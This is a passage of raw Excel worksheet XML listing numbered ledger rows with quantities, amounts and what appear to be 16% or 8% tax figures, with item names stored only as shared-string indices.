        <v>10</v>
      </c>
      <c r="I1845" s="14">
        <v>886</v>
      </c>
      <c r="J1845" s="15">
        <v>141.76</v>
      </c>
      <c r="K1845" s="16"/>
    </row>
    <row r="1846" spans="2:11">
      <c r="B1846" s="9">
        <v>1880</v>
      </c>
      <c r="C1846" s="238" t="s">
        <v>9760</v>
      </c>
      <c r="D1846" s="238" t="s">
        <v>9761</v>
      </c>
      <c r="E1846" s="238" t="s">
        <v>9762</v>
      </c>
      <c r="F1846" s="9"/>
      <c r="G1846" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1846" s="10">
        <v>100</v>
      </c>
      <c r="I1846" s="14">
        <v>9401.7</v>
      </c>
      <c r="J1846" s="15">
        <v>1504.32</v>
      </c>
      <c r="K1846" s="16"/>
    </row>
    <row r="1847" spans="2:11">
      <c r="B1847" s="9">
        <v>1881</v>
      </c>
      <c r="C1847" s="238" t="s">
        <v>9763</v>
      </c>
      <c r="D1847" s="238" t="s">
        <v>9751</v>
      </c>
      <c r="E1847" s="238" t="s">
        <v>9752</v>
      </c>
      <c r="F1847" s="238" t="s">
        <v>9764</v>
      </c>
      <c r="G1847" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1847" s="10">
        <v>100</v>
      </c>
      <c r="I1847" s="14">
        <v>153.85</v>
      </c>
      <c r="J1847" s="15">
        <v>24.64</v>
      </c>
      <c r="K1847" s="16"/>
    </row>
    <row r="1848" spans="2:11">
      <c r="B1848" s="9">
        <v>1882</v>
      </c>
      <c r="C1848" s="238" t="s">
        <v>9765</v>
      </c>
      <c r="D1848" s="238" t="s">
        <v>9766</v>
      </c>
      <c r="E1848" s="238" t="s">
        <v>9767</v>
      </c>
      <c r="F1848" s="9"/>
      <c r="G1848" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1848" s="10">
        <v>229</v>
      </c>
      <c r="I1848" s="14">
        <v>1039.55</v>
      </c>
      <c r="J1848" s="15">
        <v>166.3456</v>
      </c>
      <c r="K1848" s="16"/>
    </row>
    <row r="1849" spans="2:11">
      <c r="B1849" s="9">
        <v>1883</v>
      </c>
      <c r="C1849" s="238" t="s">
        <v>9768</v>
      </c>
      <c r="D1849" s="238" t="s">
        <v>9769</v>
      </c>
      <c r="E1849" s="238" t="s">
        <v>9770</v>
      </c>
      <c r="F1849" s="238" t="s">
        <v>9771</v>
      </c>
      <c r="G1849" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1849" s="10">
        <v>20</v>
      </c>
      <c r="I1849" s="14">
        <v>957.26</v>
      </c>
      <c r="J1849" s="15">
        <v>153.152</v>
      </c>
      <c r="K1849" s="16"/>
    </row>
    <row r="1850" spans="2:11">
      <c r="B1850" s="9">
        <v>1884</v>
      </c>
      <c r="C1850" s="238" t="s">
        <v>9772</v>
      </c>
      <c r="D1850" s="238" t="s">
        <v>9766</v>
      </c>
      <c r="E1850" s="238" t="s">
        <v>9767</v>
      </c>
      <c r="F1850" s="238" t="s">
        <v>9773</v>
      </c>
      <c r="G1850" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1850" s="10">
        <v>20</v>
      </c>
      <c r="I1850" s="14">
        <v>193.36</v>
      </c>
      <c r="J1850" s="15">
        <v>30.944</v>
      </c>
      <c r="K1850" s="16"/>
    </row>
    <row r="1851" spans="2:11">
      <c r="B1851" s="9">
        <v>1885</v>
      </c>
      <c r="C1851" s="238" t="s">
        <v>9774</v>
      </c>
      <c r="D1851" s="238" t="s">
        <v>9766</v>
      </c>
      <c r="E1851" s="238" t="s">
        <v>9767</v>
      </c>
      <c r="F1851" s="238" t="s">
        <v>9775</v>
      </c>
      <c r="G1851" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1851" s="10">
        <v>16</v>
      </c>
      <c r="I1851" s="14">
        <v>41.02</v>
      </c>
      <c r="J1851" s="15">
        <v>6.5536</v>
      </c>
      <c r="K1851" s="16"/>
    </row>
    <row r="1852" spans="2:11">
      <c r="B1852" s="9">
        <v>1886</v>
      </c>
      <c r="C1852" s="238" t="s">
        <v>9776</v>
      </c>
      <c r="D1852" s="238" t="s">
        <v>9766</v>
      </c>
      <c r="E1852" s="238" t="s">
        <v>9767</v>
      </c>
      <c r="F1852" s="238" t="s">
        <v>9777</v>
      </c>
      <c r="G1852" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1852" s="10">
        <v>23</v>
      </c>
      <c r="I1852" s="14">
        <v>88.16</v>
      </c>
      <c r="J1852" s="15">
        <v>14.0944</v>
      </c>
      <c r="K1852" s="16"/>
    </row>
    <row r="1853" spans="2:11">
      <c r="B1853" s="9">
        <v>1887</v>
      </c>
      <c r="C1853" s="238" t="s">
        <v>9778</v>
      </c>
      <c r="D1853" s="238" t="s">
        <v>9779</v>
      </c>
      <c r="E1853" s="238" t="s">
        <v>8893</v>
      </c>
      <c r="F1853" s="238" t="s">
        <v>8681</v>
      </c>
      <c r="G1853" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1853" s="10">
        <v>218</v>
      </c>
      <c r="I1853" s="14">
        <v>4423.43</v>
      </c>
      <c r="J1853" s="15">
        <v>707.7152</v>
      </c>
      <c r="K1853" s="16"/>
    </row>
    <row r="1854" spans="2:11">
      <c r="B1854" s="9">
        <v>1888</v>
      </c>
      <c r="C1854" s="238" t="s">
        <v>9780</v>
      </c>
      <c r="D1854" s="238" t="s">
        <v>9781</v>
      </c>
      <c r="E1854" s="238" t="s">
        <v>8893</v>
      </c>
      <c r="F1854" s="238" t="s">
        <v>9782</v>
      </c>
      <c r="G1854" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1854" s="10">
        <v>11</v>
      </c>
      <c r="I1854" s="14">
        <v>357.25</v>
      </c>
      <c r="J1854" s="15">
        <v>57.1648</v>
      </c>
      <c r="K1854" s="16"/>
    </row>
    <row r="1855" spans="2:11">
      <c r="B1855" s="9">
        <v>1889</v>
      </c>
      <c r="C1855" s="238" t="s">
        <v>9783</v>
      </c>
      <c r="D1855" s="238" t="s">
        <v>9784</v>
      </c>
      <c r="E1855" s="238" t="s">
        <v>8893</v>
      </c>
      <c r="F1855" s="238" t="s">
        <v>9785</v>
      </c>
      <c r="G1855" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1855" s="10">
        <v>140</v>
      </c>
      <c r="I1855" s="14">
        <v>3642.9</v>
      </c>
      <c r="J1855" s="15">
        <v>582.848</v>
      </c>
      <c r="K1855" s="16"/>
    </row>
    <row r="1856" spans="2:11">
      <c r="B1856" s="9">
        <v>1890</v>
      </c>
      <c r="C1856" s="238" t="s">
        <v>9786</v>
      </c>
      <c r="D1856" s="238" t="s">
        <v>9787</v>
      </c>
      <c r="E1856" s="238" t="s">
        <v>9788</v>
      </c>
      <c r="F1856" s="9"/>
      <c r="G1856" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1856" s="10">
        <v>3</v>
      </c>
      <c r="I1856" s="14">
        <v>38.46</v>
      </c>
      <c r="J1856" s="15">
        <v>3.0768</v>
      </c>
      <c r="K1856" s="16"/>
    </row>
    <row r="1857" spans="2:11">
      <c r="B1857" s="9">
        <v>1891</v>
      </c>
      <c r="C1857" s="238" t="s">
        <v>9789</v>
      </c>
      <c r="D1857" s="238" t="s">
        <v>9790</v>
      </c>
      <c r="E1857" s="238" t="s">
        <v>9791</v>
      </c>
      <c r="F1857" s="9"/>
      <c r="G1857" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1857" s="10">
        <v>9</v>
      </c>
      <c r="I1857" s="14">
        <v>139.27</v>
      </c>
      <c r="J1857" s="15">
        <v>11.1384</v>
      </c>
      <c r="K1857" s="16"/>
    </row>
    <row r="1858" spans="2:11">
      <c r="B1858" s="9">
        <v>1892</v>
      </c>
      <c r="C1858" s="238" t="s">
        <v>9792</v>
      </c>
      <c r="D1858" s="238" t="s">
        <v>9793</v>
      </c>
      <c r="E1858" s="238" t="s">
        <v>9794</v>
      </c>
      <c r="F1858" s="9" t="s">
        <v>9795</v>
      </c>
      <c r="G1858" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1858" s="10">
        <v>30</v>
      </c>
      <c r="I1858" s="14">
        <v>1093.36</v>
      </c>
      <c r="J1858" s="15">
        <v>87.48</v>
      </c>
      <c r="K1858" s="16"/>
    </row>
    <row r="1859" spans="2:11">
      <c r="B1859" s="9">
        <v>1893</v>
      </c>
      <c r="C1859" s="238" t="s">
        <v>9796</v>
      </c>
      <c r="D1859" s="238" t="s">
        <v>9797</v>
      </c>
      <c r="E1859" s="238" t="s">
        <v>9798</v>
      </c>
      <c r="F1859" s="9"/>
      <c r="G1859" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1859" s="10">
        <v>22</v>
      </c>
      <c r="I1859" s="14">
        <v>131.94</v>
      </c>
      <c r="J1859" s="15">
        <v>10.56</v>
      </c>
      <c r="K1859" s="16"/>
    </row>
    <row r="1860" spans="2:11">
      <c r="B1860" s="9">
        <v>1894</v>
      </c>
      <c r="C1860" s="238" t="s">
        <v>9799</v>
      </c>
      <c r="D1860" s="238" t="s">
        <v>9800</v>
      </c>
      <c r="E1860" s="238" t="s">
        <v>9801</v>
      </c>
      <c r="F1860" s="9"/>
      <c r="G1860" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1860" s="10">
        <v>5</v>
      </c>
      <c r="I1860" s="14">
        <v>279.98</v>
      </c>
      <c r="J1860" s="15">
        <v>22.4</v>
      </c>
      <c r="K1860" s="16"/>
    </row>
    <row r="1861" spans="2:11">
      <c r="B1861" s="9">
        <v>1895</v>
      </c>
      <c r="C1861" s="238" t="s">
        <v>9802</v>
      </c>
      <c r="D1861" s="238" t="s">
        <v>9803</v>
      </c>
      <c r="E1861" s="238" t="s">
        <v>9804</v>
      </c>
      <c r="F1861" s="9"/>
      <c r="G1861" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1861" s="10">
        <v>20</v>
      </c>
      <c r="I1861" s="14">
        <v>205.13</v>
      </c>
      <c r="J1861" s="15">
        <v>16.416</v>
      </c>
      <c r="K1861" s="16"/>
    </row>
    <row r="1862" spans="2:11">
      <c r="B1862" s="9">
        <v>1896</v>
      </c>
      <c r="C1862" s="238" t="s">
        <v>9805</v>
      </c>
      <c r="D1862" s="238" t="s">
        <v>9806</v>
      </c>
      <c r="E1862" s="238" t="s">
        <v>9807</v>
      </c>
      <c r="F1862" s="9"/>
      <c r="G1862" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1862" s="10">
        <v>80</v>
      </c>
      <c r="I1862" s="14">
        <v>929.99</v>
      </c>
      <c r="J1862" s="15">
        <v>74.368</v>
      </c>
      <c r="K1862" s="16"/>
    </row>
    <row r="1863" spans="2:11">
      <c r="B1863" s="9">
        <v>1897</v>
      </c>
      <c r="C1863" s="238" t="s">
        <v>9808</v>
      </c>
      <c r="D1863" s="238" t="s">
        <v>9809</v>
      </c>
      <c r="E1863" s="238" t="s">
        <v>9810</v>
      </c>
      <c r="F1863" s="9"/>
      <c r="G1863" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1863" s="10">
        <v>27</v>
      </c>
      <c r="I1863" s="14">
        <v>166.47</v>
      </c>
      <c r="J1863" s="15">
        <v>13.3272</v>
      </c>
      <c r="K1863" s="16"/>
    </row>
    <row r="1864" spans="2:11">
      <c r="B1864" s="9">
        <v>1898</v>
      </c>
      <c r="C1864" s="238" t="s">
        <v>9811</v>
      </c>
      <c r="D1864" s="238" t="s">
        <v>9812</v>
      </c>
      <c r="E1864" s="238" t="s">
        <v>9813</v>
      </c>
      <c r="F1864" s="9"/>
      <c r="G1864" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1864" s="10">
        <v>3</v>
      </c>
      <c r="I1864" s="14">
        <v>71.21</v>
      </c>
      <c r="J1864" s="15">
        <v>5.6976</v>
      </c>
      <c r="K1864" s="16"/>
    </row>
    <row r="1865" spans="2:11">
      <c r="B1865" s="9">
        <v>1899</v>
      </c>
      <c r="C1865" s="238" t="s">
        <v>9814</v>
      </c>
      <c r="D1865" s="238" t="s">
        <v>9815</v>
      </c>
      <c r="E1865" s="238" t="s">
        <v>9816</v>
      </c>
      <c r="F1865" s="9"/>
      <c r="G1865" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1865" s="10">
        <v>7</v>
      </c>
      <c r="I1865" s="14">
        <v>98</v>
      </c>
      <c r="J1865" s="15">
        <v>7.84</v>
      </c>
      <c r="K1865" s="16"/>
    </row>
    <row r="1866" spans="2:11">
      <c r="B1866" s="9">
        <v>1900</v>
      </c>
      <c r="C1866" s="238" t="s">
        <v>9817</v>
      </c>
      <c r="D1866" s="238" t="s">
        <v>9818</v>
      </c>
      <c r="E1866" s="238" t="s">
        <v>9819</v>
      </c>
      <c r="F1866" s="9"/>
      <c r="G1866" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1866" s="10">
        <v>32</v>
      </c>
      <c r="I1866" s="14">
        <v>2142.57</v>
      </c>
      <c r="J1866" s="15">
        <v>171.4176</v>
      </c>
      <c r="K1866" s="16"/>
    </row>
    <row r="1867" spans="2:11">
      <c r="B1867" s="9">
        <v>1901</v>
      </c>
      <c r="C1867" s="238" t="s">
        <v>9820</v>
      </c>
      <c r="D1867" s="238" t="s">
        <v>9821</v>
      </c>
      <c r="E1867" s="238" t="s">
        <v>9822</v>
      </c>
      <c r="F1867" s="9"/>
      <c r="G1867" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1867" s="10">
        <v>2</v>
      </c>
      <c r="I1867" s="14">
        <v>18.47</v>
      </c>
      <c r="J1867" s="15">
        <v>1.4784</v>
      </c>
      <c r="K1867" s="16"/>
    </row>
    <row r="1868" spans="2:11">
      <c r="B1868" s="9">
        <v>1902</v>
      </c>
      <c r="C1868" s="238" t="s">
        <v>9823</v>
      </c>
      <c r="D1868" s="238" t="s">
        <v>9824</v>
      </c>
      <c r="E1868" s="238" t="s">
        <v>9825</v>
      </c>
      <c r="F1868" s="9"/>
      <c r="G1868" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1868" s="10">
        <v>3</v>
      </c>
      <c r="I1868" s="14">
        <v>41.75</v>
      </c>
      <c r="J1868" s="15">
        <v>3.3408</v>
      </c>
      <c r="K1868" s="16"/>
    </row>
    <row r="1869" spans="2:11">
      <c r="B1869" s="9">
        <v>1903</v>
      </c>
      <c r="C1869" s="238" t="s">
        <v>9826</v>
      </c>
      <c r="D1869" s="238" t="s">
        <v>9827</v>
      </c>
      <c r="E1869" s="238" t="s">
        <v>9828</v>
      </c>
      <c r="F1869" s="9"/>
      <c r="G1869" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1869" s="10">
        <v>44</v>
      </c>
      <c r="I1869" s="14">
        <v>362.07</v>
      </c>
      <c r="J1869" s="15">
        <v>28.9696</v>
      </c>
      <c r="K1869" s="16"/>
    </row>
    <row r="1870" spans="2:11">
      <c r="B1870" s="9">
        <v>1904</v>
      </c>
      <c r="C1870" s="238" t="s">
        <v>9829</v>
      </c>
      <c r="D1870" s="238" t="s">
        <v>9830</v>
      </c>
      <c r="E1870" s="238" t="s">
        <v>9831</v>
      </c>
      <c r="F1870" s="9"/>
      <c r="G1870" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1870" s="10">
        <v>7</v>
      </c>
      <c r="I1870" s="14">
        <v>128.44</v>
      </c>
      <c r="J1870" s="15">
        <v>10.276</v>
      </c>
      <c r="K1870" s="16"/>
    </row>
    <row r="1871" spans="2:11">
      <c r="B1871" s="9">
        <v>1905</v>
      </c>
      <c r="C1871" s="238" t="s">
        <v>9832</v>
      </c>
      <c r="D1871" s="238" t="s">
        <v>9833</v>
      </c>
      <c r="E1871" s="238" t="s">
        <v>9834</v>
      </c>
      <c r="F1871" s="9"/>
      <c r="G1871" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1871" s="10">
        <v>15</v>
      </c>
      <c r="I1871" s="14">
        <v>105.46</v>
      </c>
      <c r="J1871" s="15">
        <v>8.436</v>
      </c>
      <c r="K1871" s="16"/>
    </row>
    <row r="1872" spans="2:11">
      <c r="B1872" s="9">
        <v>1906</v>
      </c>
      <c r="C1872" s="238" t="s">
        <v>9835</v>
      </c>
      <c r="D1872" s="238" t="s">
        <v>9836</v>
      </c>
      <c r="E1872" s="238" t="s">
        <v>9837</v>
      </c>
      <c r="F1872" s="9"/>
      <c r="G1872" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1872" s="10">
        <v>2</v>
      </c>
      <c r="I1872" s="14">
        <v>44.45</v>
      </c>
      <c r="J1872" s="15">
        <v>3.5568</v>
      </c>
      <c r="K1872" s="16"/>
    </row>
    <row r="1873" spans="2:11">
      <c r="B1873" s="9">
        <v>1907</v>
      </c>
      <c r="C1873" s="238" t="s">
        <v>9838</v>
      </c>
      <c r="D1873" s="238" t="s">
        <v>9839</v>
      </c>
      <c r="E1873" s="238" t="s">
        <v>9840</v>
      </c>
      <c r="F1873" s="9"/>
      <c r="G1873" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1873" s="10">
        <v>2</v>
      </c>
      <c r="I1873" s="14">
        <v>14</v>
      </c>
      <c r="J1873" s="15">
        <v>1.12</v>
      </c>
      <c r="K1873" s="16"/>
    </row>
    <row r="1874" spans="2:11">
      <c r="B1874" s="9">
        <v>1908</v>
      </c>
      <c r="C1874" s="238" t="s">
        <v>9841</v>
      </c>
      <c r="D1874" s="238" t="s">
        <v>9842</v>
      </c>
      <c r="E1874" s="238" t="s">
        <v>9843</v>
      </c>
      <c r="F1874" s="9"/>
      <c r="G1874" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1874" s="10">
        <v>1</v>
      </c>
      <c r="I1874" s="14">
        <v>14.63</v>
      </c>
      <c r="J1874" s="15">
        <v>1.1704</v>
      </c>
      <c r="K1874" s="16"/>
    </row>
    <row r="1875" spans="2:11">
      <c r="B1875" s="9">
        <v>1909</v>
      </c>
      <c r="C1875" s="238" t="s">
        <v>9844</v>
      </c>
      <c r="D1875" s="238" t="s">
        <v>9845</v>
      </c>
      <c r="E1875" s="238" t="s">
        <v>9846</v>
      </c>
      <c r="F1875" s="9"/>
      <c r="G1875" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1875" s="10">
        <v>7</v>
      </c>
      <c r="I1875" s="14">
        <v>59.82</v>
      </c>
      <c r="J1875" s="15">
        <v>4.788</v>
      </c>
      <c r="K1875" s="16"/>
    </row>
    <row r="1876" spans="2:11">
      <c r="B1876" s="9">
        <v>1910</v>
      </c>
      <c r="C1876" s="238" t="s">
        <v>9847</v>
      </c>
      <c r="D1876" s="238" t="s">
        <v>9848</v>
      </c>
      <c r="E1876" s="238" t="s">
        <v>9849</v>
      </c>
      <c r="F1876" s="9"/>
      <c r="G1876" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1876" s="10">
        <v>20</v>
      </c>
      <c r="I1876" s="14">
        <v>85.41</v>
      </c>
      <c r="J1876" s="15">
        <v>6.832</v>
      </c>
      <c r="K1876" s="16"/>
    </row>
    <row r="1877" spans="2:11">
      <c r="B1877" s="9">
        <v>1911</v>
      </c>
      <c r="C1877" s="238" t="s">
        <v>9850</v>
      </c>
      <c r="D1877" s="238" t="s">
        <v>9851</v>
      </c>
      <c r="E1877" s="238" t="s">
        <v>9852</v>
      </c>
      <c r="F1877" s="9"/>
      <c r="G1877" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1877" s="10">
        <v>8</v>
      </c>
      <c r="I1877" s="14">
        <v>79.49</v>
      </c>
      <c r="J1877" s="15">
        <v>6.3616</v>
      </c>
      <c r="K1877" s="16"/>
    </row>
    <row r="1878" spans="2:11">
      <c r="B1878" s="9">
        <v>1912</v>
      </c>
      <c r="C1878" s="238" t="s">
        <v>9853</v>
      </c>
      <c r="D1878" s="238" t="s">
        <v>9854</v>
      </c>
      <c r="E1878" s="238" t="s">
        <v>9855</v>
      </c>
      <c r="F1878" s="9"/>
      <c r="G1878" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1878" s="10">
        <v>9</v>
      </c>
      <c r="I1878" s="14">
        <v>144</v>
      </c>
      <c r="J1878" s="15">
        <v>11.52</v>
      </c>
      <c r="K1878" s="16"/>
    </row>
    <row r="1879" spans="2:11">
      <c r="B1879" s="9">
        <v>1913</v>
      </c>
      <c r="C1879" s="238" t="s">
        <v>9856</v>
      </c>
      <c r="D1879" s="238" t="s">
        <v>9857</v>
      </c>
      <c r="E1879" s="238" t="s">
        <v>9858</v>
      </c>
      <c r="F1879" s="9"/>
      <c r="G1879" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1879" s="10">
        <v>15</v>
      </c>
      <c r="I1879" s="14">
        <v>108.08</v>
      </c>
      <c r="J1879" s="15">
        <v>8.652</v>
      </c>
      <c r="K1879" s="16"/>
    </row>
    <row r="1880" spans="2:11">
      <c r="B1880" s="9">
        <v>1914</v>
      </c>
      <c r="C1880" s="238" t="s">
        <v>9859</v>
      </c>
      <c r="D1880" s="238" t="s">
        <v>9860</v>
      </c>
      <c r="E1880" s="238" t="s">
        <v>9861</v>
      </c>
      <c r="F1880" s="9"/>
      <c r="G1880" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1880" s="10">
        <v>38</v>
      </c>
      <c r="I1880" s="14">
        <v>565.62</v>
      </c>
      <c r="J1880" s="15">
        <v>45.2352</v>
      </c>
      <c r="K1880" s="16"/>
    </row>
    <row r="1881" spans="2:11">
      <c r="B1881" s="9">
        <v>1915</v>
      </c>
      <c r="C1881" s="238" t="s">
        <v>9862</v>
      </c>
      <c r="D1881" s="238" t="s">
        <v>9863</v>
      </c>
      <c r="E1881" s="238" t="s">
        <v>9864</v>
      </c>
      <c r="F1881" s="9"/>
      <c r="G1881" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1881" s="10">
        <v>7</v>
      </c>
      <c r="I1881" s="14">
        <v>279.29</v>
      </c>
      <c r="J1881" s="15">
        <v>22.344</v>
      </c>
      <c r="K1881" s="16"/>
    </row>
    <row r="1882" spans="2:11">
      <c r="B1882" s="9">
        <v>1916</v>
      </c>
      <c r="C1882" s="238" t="s">
        <v>9865</v>
      </c>
      <c r="D1882" s="238" t="s">
        <v>9866</v>
      </c>
      <c r="E1882" s="238" t="s">
        <v>9867</v>
      </c>
      <c r="F1882" s="9"/>
      <c r="G1882" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1882" s="10">
        <v>35</v>
      </c>
      <c r="I1882" s="14">
        <v>4786.33</v>
      </c>
      <c r="J1882" s="15">
        <v>382.9</v>
      </c>
      <c r="K1882" s="16"/>
    </row>
    <row r="1883" spans="2:11">
      <c r="B1883" s="9">
        <v>1917</v>
      </c>
      <c r="C1883" s="238" t="s">
        <v>9868</v>
      </c>
      <c r="D1883" s="238" t="s">
        <v>9869</v>
      </c>
      <c r="E1883" s="238" t="s">
        <v>9870</v>
      </c>
      <c r="F1883" s="9"/>
      <c r="G1883" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1883" s="10">
        <v>1</v>
      </c>
      <c r="I1883" s="14">
        <v>12.7</v>
      </c>
      <c r="J1883" s="15">
        <v>1.016</v>
      </c>
      <c r="K1883" s="16"/>
    </row>
    <row r="1884" spans="2:11">
      <c r="B1884" s="9">
        <v>1918</v>
      </c>
      <c r="C1884" s="238" t="s">
        <v>9871</v>
      </c>
      <c r="D1884" s="238" t="s">
        <v>6887</v>
      </c>
      <c r="E1884" s="238" t="s">
        <v>9872</v>
      </c>
      <c r="F1884" s="9"/>
      <c r="G1884" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1884" s="10">
        <v>35</v>
      </c>
      <c r="I1884" s="14">
        <v>414.56</v>
      </c>
      <c r="J1884" s="15">
        <v>33.152</v>
      </c>
      <c r="K1884" s="16"/>
    </row>
    <row r="1885" spans="2:11">
      <c r="B1885" s="9">
        <v>1919</v>
      </c>
      <c r="C1885" s="238" t="s">
        <v>9873</v>
      </c>
      <c r="D1885" s="238" t="s">
        <v>9874</v>
      </c>
      <c r="E1885" s="238" t="s">
        <v>9875</v>
      </c>
      <c r="F1885" s="9"/>
      <c r="G1885" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1885" s="10">
        <v>7</v>
      </c>
      <c r="I1885" s="14">
        <v>703.95</v>
      </c>
      <c r="J1885" s="15">
        <v>56.3136</v>
      </c>
      <c r="K1885" s="16"/>
    </row>
    <row r="1886" spans="2:11">
      <c r="B1886" s="9">
        <v>1920</v>
      </c>
      <c r="C1886" s="238" t="s">
        <v>9876</v>
      </c>
      <c r="D1886" s="238" t="s">
        <v>9877</v>
      </c>
      <c r="E1886" s="238" t="s">
        <v>9878</v>
      </c>
      <c r="F1886" s="9"/>
      <c r="G1886" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1886" s="10">
        <v>5</v>
      </c>
      <c r="I1886" s="14">
        <v>1252.97</v>
      </c>
      <c r="J1886" s="15">
        <v>100.236</v>
      </c>
      <c r="K1886" s="16"/>
    </row>
    <row r="1887" spans="2:11">
      <c r="B1887" s="9">
        <v>1921</v>
      </c>
      <c r="C1887" s="238" t="s">
        <v>9879</v>
      </c>
      <c r="D1887" s="238" t="s">
        <v>9880</v>
      </c>
      <c r="E1887" s="238" t="s">
        <v>9881</v>
      </c>
      <c r="F1887" s="9"/>
      <c r="G1887" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1887" s="10">
        <v>6</v>
      </c>
      <c r="I1887" s="14">
        <v>177.23</v>
      </c>
      <c r="J1887" s="15">
        <v>14.1792</v>
      </c>
      <c r="K1887" s="16"/>
    </row>
    <row r="1888" spans="2:11">
      <c r="B1888" s="9">
        <v>1922</v>
      </c>
      <c r="C1888" s="238" t="s">
        <v>9882</v>
      </c>
      <c r="D1888" s="238" t="s">
        <v>9883</v>
      </c>
      <c r="E1888" s="238" t="s">
        <v>9884</v>
      </c>
      <c r="F1888" s="9"/>
      <c r="G1888" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1888" s="10">
        <v>5</v>
      </c>
      <c r="I1888" s="14">
        <v>28</v>
      </c>
      <c r="J1888" s="15">
        <v>2.24</v>
      </c>
      <c r="K1888" s="16"/>
    </row>
    <row r="1889" spans="2:11">
      <c r="B1889" s="9">
        <v>1923</v>
      </c>
      <c r="C1889" s="238" t="s">
        <v>9885</v>
      </c>
      <c r="D1889" s="238" t="s">
        <v>9886</v>
      </c>
      <c r="E1889" s="238" t="s">
        <v>9887</v>
      </c>
      <c r="F1889" s="9"/>
      <c r="G1889" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1889" s="10">
        <v>2</v>
      </c>
      <c r="I1889" s="14">
        <v>32.68</v>
      </c>
      <c r="J1889" s="15">
        <v>2.6144</v>
      </c>
      <c r="K1889" s="16"/>
    </row>
    <row r="1890" spans="2:11">
      <c r="B1890" s="9">
        <v>1924</v>
      </c>
      <c r="C1890" s="238" t="s">
        <v>9888</v>
      </c>
      <c r="D1890" s="238" t="s">
        <v>9889</v>
      </c>
      <c r="E1890" s="238" t="s">
        <v>9890</v>
      </c>
      <c r="F1890" s="9"/>
      <c r="G1890" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1890" s="10">
        <v>5</v>
      </c>
      <c r="I1890" s="14">
        <v>1366.5</v>
      </c>
      <c r="J1890" s="15">
        <v>109.32</v>
      </c>
      <c r="K1890" s="16"/>
    </row>
    <row r="1891" spans="2:11">
      <c r="B1891" s="9">
        <v>1925</v>
      </c>
      <c r="C1891" s="238" t="s">
        <v>9891</v>
      </c>
      <c r="D1891" s="238" t="s">
        <v>4701</v>
      </c>
      <c r="E1891" s="238" t="s">
        <v>9892</v>
      </c>
      <c r="F1891" s="9"/>
      <c r="G1891" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1891" s="10">
        <v>5</v>
      </c>
      <c r="I1891" s="14">
        <v>58.97</v>
      </c>
      <c r="J1891" s="15">
        <v>4.716</v>
      </c>
      <c r="K1891" s="16"/>
    </row>
    <row r="1892" spans="2:11">
      <c r="B1892" s="9">
        <v>1926</v>
      </c>
      <c r="C1892" s="238" t="s">
        <v>9893</v>
      </c>
      <c r="D1892" s="238" t="s">
        <v>9894</v>
      </c>
      <c r="E1892" s="238" t="s">
        <v>9895</v>
      </c>
      <c r="F1892" s="9"/>
      <c r="G1892" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1892" s="10">
        <v>10</v>
      </c>
      <c r="I1892" s="14">
        <v>1025.64</v>
      </c>
      <c r="J1892" s="15">
        <v>82.048</v>
      </c>
      <c r="K1892" s="16"/>
    </row>
    <row r="1893" spans="2:11">
      <c r="B1893" s="9">
        <v>1927</v>
      </c>
      <c r="C1893" s="238" t="s">
        <v>9896</v>
      </c>
      <c r="D1893" s="238" t="s">
        <v>9897</v>
      </c>
      <c r="E1893" s="238" t="s">
        <v>9898</v>
      </c>
      <c r="F1893" s="9"/>
      <c r="G1893" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1893" s="10">
        <v>6</v>
      </c>
      <c r="I1893" s="14">
        <v>242.16</v>
      </c>
      <c r="J1893" s="15">
        <v>19.3728</v>
      </c>
      <c r="K1893" s="16"/>
    </row>
    <row r="1894" spans="2:11">
      <c r="B1894" s="9">
        <v>1928</v>
      </c>
      <c r="C1894" s="238" t="s">
        <v>9899</v>
      </c>
      <c r="D1894" s="238" t="s">
        <v>9900</v>
      </c>
      <c r="E1894" s="238" t="s">
        <v>9901</v>
      </c>
      <c r="F1894" s="9"/>
      <c r="G1894" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1894" s="10">
        <v>10</v>
      </c>
      <c r="I1894" s="14">
